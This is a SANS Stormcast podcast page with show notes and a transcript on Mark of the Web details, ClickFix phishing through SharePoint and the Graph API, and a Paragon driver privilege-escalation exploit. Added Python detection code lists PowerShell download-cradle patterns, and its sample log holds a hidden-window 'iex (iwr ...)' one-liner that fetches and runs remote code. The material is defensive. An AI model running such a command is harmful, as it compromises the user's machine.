
SANS Stormcast Tuesday Mar 4th: Mark of the Web Details; SharePoint and Click-Fix Phishing; Paragon Partition Manager BYOVD Exploit

If you are not able to play the podcast using the player below, use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9348.mp3


Mark of the Web: Some Technical Details
Windows implements the "Mark of the Web" (MotW) as an alternate data stream that contains not just the "zoneid" recording where the file came from; it may also include other data such as the exact URL and the referrer.
https://isc.sans.edu/diary/Mark%20of%20the%20Web%3A%20Some%20Technical%20Details/31732
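The stream is plain INI-style text, so it is easy to inspect programmatically. The parser below is an added example (not code from the ISC diary): it reads the `[ZoneTransfer]` section, maps the zone id to the Internet Explorer security-zone names, and keeps the optional URL fields so a triage script can tell a full mark from the reduced one a private-browsing download leaves. The sample stream contents are constructed; the `read_mark_of_the_web` helper only works on NTFS, where the stream is opened as `<path>:Zone.Identifier`.

```python
"""Parse a Windows Mark-of-the-Web stream (the Zone.Identifier alternate data stream).

Added example, not code from the ISC diary. Zone ids follow the Internet Explorer URL
security zone numbering; the sample stream contents below are constructed.
"""
from dataclasses import dataclass
from typing import Dict, Optional

ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}


@dataclass
class MarkOfTheWeb:
    zone_id: int
    host_url: Optional[str]      # URL the file was downloaded from, if the browser recorded it
    referrer_url: Optional[str]  # page that led the user to that URL, if recorded
    extra: Dict[str, str]        # any other keys found in [ZoneTransfer]

    @property
    def zone_name(self) -> str:
        return ZONE_NAMES.get(self.zone_id, f"unknown zone {self.zone_id}")

    @property
    def triggers_warning(self) -> bool:
        # Files from the Internet and Restricted Sites zones are the ones Windows treats as
        # untrusted downloads (assumption used for this example).
        return self.zone_id >= 3


def parse_zone_identifier(text: str) -> MarkOfTheWeb:
    """Parse the INI-style text of a Zone.Identifier stream.

    Only keys inside the [ZoneTransfer] section are considered; ZoneId is mandatory,
    everything else (HostUrl, ReferrerUrl, ...) is optional.
    """
    section: Optional[str] = None
    fields: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "ZoneTransfer" or "=" not in line:
            continue
        key, _, value = line.partition("=")  # URLs may contain '=', so split on the first one only
        fields[key.strip()] = value.strip()
    if "ZoneId" not in fields:
        raise ValueError("not a Zone.Identifier stream: no ZoneId in [ZoneTransfer]")
    try:
        zone_id = int(fields.pop("ZoneId"))
    except ValueError:
        raise ValueError("ZoneId is not an integer") from None
    return MarkOfTheWeb(
        zone_id=zone_id,
        host_url=fields.pop("HostUrl", None),
        referrer_url=fields.pop("ReferrerUrl", None),
        extra=fields,
    )


def read_mark_of_the_web(path: str) -> Optional[MarkOfTheWeb]:
    """Read the mark from a file on NTFS (Windows only) by opening '<path>:Zone.Identifier'.

    Returns None when the file carries no mark, e.g. a locally created file or one whose
    mark was dropped by an archiver that does not preserve alternate data streams.
    """
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as stream:
            return parse_zone_identifier(stream.read())
    except OSError:
        return None


# Constructed sample: what a browser typically writes for a normal download.
SAMPLE_FULL = """[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://example.com/downloads/
HostUrl=https://example.com/downloads/tool.zip
"""

# Constructed sample: a private-browsing download records only the zone, not the URLs.
SAMPLE_MINIMAL = "[ZoneTransfer]\r\nZoneId=3\r\n"


if __name__ == "__main__":
    for sample in (SAMPLE_FULL, SAMPLE_MINIMAL):
        mark = parse_zone_identifier(sample)
        print(f"zone={mark.zone_id} ({mark.zone_name}) warning={mark.triggers_warning} "
              f"host={mark.host_url} referrer={mark.referrer_url}")
```

On a Windows host, `read_mark_of_the_web(r"C:\Users\alice\Downloads\tool.zip")` returns the parsed mark or `None`; the `None` case is exactly the propagation failure the podcast describes, so it is the condition worth alerting on when a file is known to have been downloaded.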

Havoc SharePoint with Microsoft Graph API
A recent phishing attack observed by Fortinet uses a simple HTML email to trick a user into copy-pasting PowerShell into their system to execute additional code. Most of the malware interaction uses a SharePoint site via Microsoft's Graph API, further hiding the malicious traffic.
https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
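Because neither the HTML lure nor the SharePoint traffic looks malicious on its own, the most reliable place to catch this pattern is process telemetry: PowerShell started interactively by the user with a download-and-execute command line. The script below is an added example (not Fortinet's or ISC's code) that runs such a heuristic over constructed process-creation events. The log format, the choice of `explorer.exe` as the "pasted by the user" parent, and the indicator regexes are assumptions for illustration; real telemetry (Sysmon process-creation events, EDR data) provides the same three fields.

```python
"""Flag PowerShell launches that match the copy-paste (ClickFix) pattern described above.

Added example, not Fortinet's or ISC's code. The pipe-separated log format and the
heuristics below are assumptions chosen for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Parents that indicate the user launched the process by hand (Run dialog, Explorer
# address bar) rather than a script, service or installer. Assumed for this example.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line fragments typical of a download-and-execute one-liner. Assumed indicators.
CRADLE_PATTERNS = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web download": re.compile(r"downloadstring|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

# The channel the page describes for the second stage: SharePoint reached via the Graph API.
BUSINESS_HOSTS = re.compile(r"graph\.microsoft\.com|\.sharepoint\.com", re.I)


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'key=value | key=value' log line."""
    fields: Dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: ProcessEvent) -> List[str]:
    """Return the reasons an event looks like a ClickFix paste; an empty list means not flagged."""
    if basename(event.image) not in {"powershell.exe", "pwsh.exe"}:
        return []
    interactive = basename(event.parent_image) in INTERACTIVE_PARENTS
    cradle = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(event.command_line)]
    # Require both: an interactive launch alone is a user opening a console, a cradle alone
    # is common in legitimate automation. Together they match the paste-this-error pattern.
    if not (interactive and cradle):
        return []
    reasons = ["powershell started interactively from " + basename(event.parent_image)] + cradle
    if BUSINESS_HOSTS.search(event.command_line):
        reasons.append("second stage fetched from a Microsoft 365 host")
    return reasons


def find_clickfix_candidates(log: str) -> List[Tuple[int, List[str]]]:
    """Return (line index, reasons) for every flagged event in the log text."""
    hits: List[Tuple[int, List[str]]] = []
    for index, line in enumerate(log.splitlines()):
        if not line.strip():
            continue
        reasons = assess(parse_event(line))
        if reasons:
            hits.append((index, reasons))
    return hits


# Constructed sample events: scheduled script, the pasted one-liner, a benign Explorer
# launch, and a user simply opening a PowerShell console. Site and item ids are placeholders.
SAMPLE_LOG = r"""
ts=2025-03-04T10:14:51Z | ParentImage=C:\Windows\System32\svchost.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1
ts=2025-03-04T10:15:02Z | ParentImage=C:\Windows\explorer.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine=powershell -w hidden -c "iex (iwr 'https://graph.microsoft.com/v1.0/sites/SITE_ID_PLACEHOLDER/drive/items/ITEM_ID_PLACEHOLDER/content' -UseBasicParsing)"
ts=2025-03-04T10:15:40Z | ParentImage=C:\Windows\explorer.exe | Image=C:\Windows\System32\notepad.exe | CommandLine=notepad.exe C:\Users\alice\notes.txt
ts=2025-03-04T10:16:10Z | ParentImage=C:\Windows\explorer.exe | Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine=powershell
""".strip()


if __name__ == "__main__":
    for index, reasons in find_clickfix_candidates(SAMPLE_LOG):
        print(f"line {index}: {'; '.join(reasons)}")
```

Only the second event is flagged: the first carries a download-free script launch from a service, the third is not PowerShell at all, and the fourth is a user opening a console without a command line. The Microsoft 365 host is recorded as an extra reason rather than a trigger, since traffic to SharePoint is normal business activity, as the podcast points out.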

Paragon Partition Manager Exploit
A vulnerable Paragon Partition Manager driver has been used recently to escalate privileges for ransomware deployment. Even if you do not have Paragon installed, an attacker may just "bring the vulnerable driver" to your system.
https://kb.cert.org/vuls/id/726882

Podcast Transcript

Hello and welcome to the Tuesday, March 4th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Baltimore, Maryland.

Well, and today we have a great diary by Didier showing some of the details of the mark of the web. That's a feature that we have covered a few times already in the podcast, usually because it didn't get properly propagated to different file formats depending on, for example, zip file extraction software, things like ISO images and the like, where the mark of the web is lost in transfer. So the purpose of the mark of the web is to indicate to the system that this file has been downloaded from the Internet so the user can be presented with a warning if this file is executable and the user is attempting to execute it. On Windows, the mark of the web is implemented as an alternate data stream, which is supported by the NTFS file system, but not all file systems, and with that, not all archive utilities do properly support alternate data streams, which explains some of the limitations around the mark of the web implementation on Windows. Didier also shows a little bit the details here. So first of all, the mark of the web is essentially a little text file, like an alternate data stream, and it includes, first of all, zone information that indicates where the file came from. So there are zones one through four that will then tell you; three, for example, would be this was downloaded from an external website. In addition, you may find things like the URL the file was downloaded from, the referrer, basically how was the user directed to that URL. However, those details then also depend on things like the incognito mode in the browser because that would potentially leak private information. So if you are in incognito mode, you don't get all of those details. Interesting overall, and also like the little hack, how you look at the content of the mark of the web at that alternate data stream, just in Notepad, by specifying the alternate data stream as part of your file name as you open it.

And Fortinet published an interesting piece of research regarding some recent phishing attacks that they have observed. They start with a simple email that contains an HTML attachment. The HTML attachment is something that I've actually seen more and more recently. I think we have also written some diaries about this. It's what Fortinet calls click fix. And what it refers to is if the user opens the particular HTML document, they're presented with an error message. The error message then instructs them to copy-paste code to execute it. Yes, users will do this. The user here doesn't really realize what they're doing, of course. And that will execute then a PowerShell script that installs additional malware. Another sort of interesting tidbit here is that the downloads are coming from a SharePoint site that the attacker set up and then they just use the Graph API in order to interact with that SharePoint site. This way, it also becomes quite difficult for intrusion detection tools and other tools to detect the attack because, first of all, the initial email is just an HTML email. There is nothing sort of executable really in that HTML. It's not like JavaScript or anything like this that's often associated with malicious HTML. Well, the user here essentially exploits themselves by copy-pasting that PowerShell script. And secondly, all the interaction with SharePoint, of course, may not necessarily trigger alerts because that's usually considered a valid business resource and something that you may use for lots of other purposes.

Then an interesting noteworthy vulnerability is we do have a vulnerability in the Paragon Partition Manager. Actually, it's not the software itself or part of it. It's really the driver that's being delivered with that software. That's a kernel-level driver. And as such, it's digitally signed to be trusted to operate at the kernel level, which you will need if you are trying to manage partitions. The problem is that versions prior to version 2 are vulnerable to actually a number of different vulnerabilities, one of which is now being exploited by ransomware gangs for privilege escalation. It's a little bit of a tricky thing. So, first of all, yes, you should update Paragon Partition Manager if you run it, but this is even a problem if you never installed this software because an attacker may install that driver for you and then use it for privilege escalation. Microsoft did add this driver to its vulnerable driver block list, so make sure you have that implemented. But there have been issues with that vulnerable driver block list in the past, so not sure how well this works these days. Maybe add some signatures as such to detect these older versions of the driver just as outright malicious if you're not using this software. And yes, of course, definitely upgrade if you are using this software.

Well, and that's it for today. Thanks to everybody who noted that I forgot to actually add this outro yesterday. Sorry for that. Just forgot to splice it in. At the end, if you are interested in taking the Intrusion Detection class with me that I'm teaching this week here in Baltimore, I'll actually be back in Baltimore with the same class first week of June. Links to future classes, you'll always find them below the show notes for the podcast. Thanks and talk to you again tomorrow. Bye.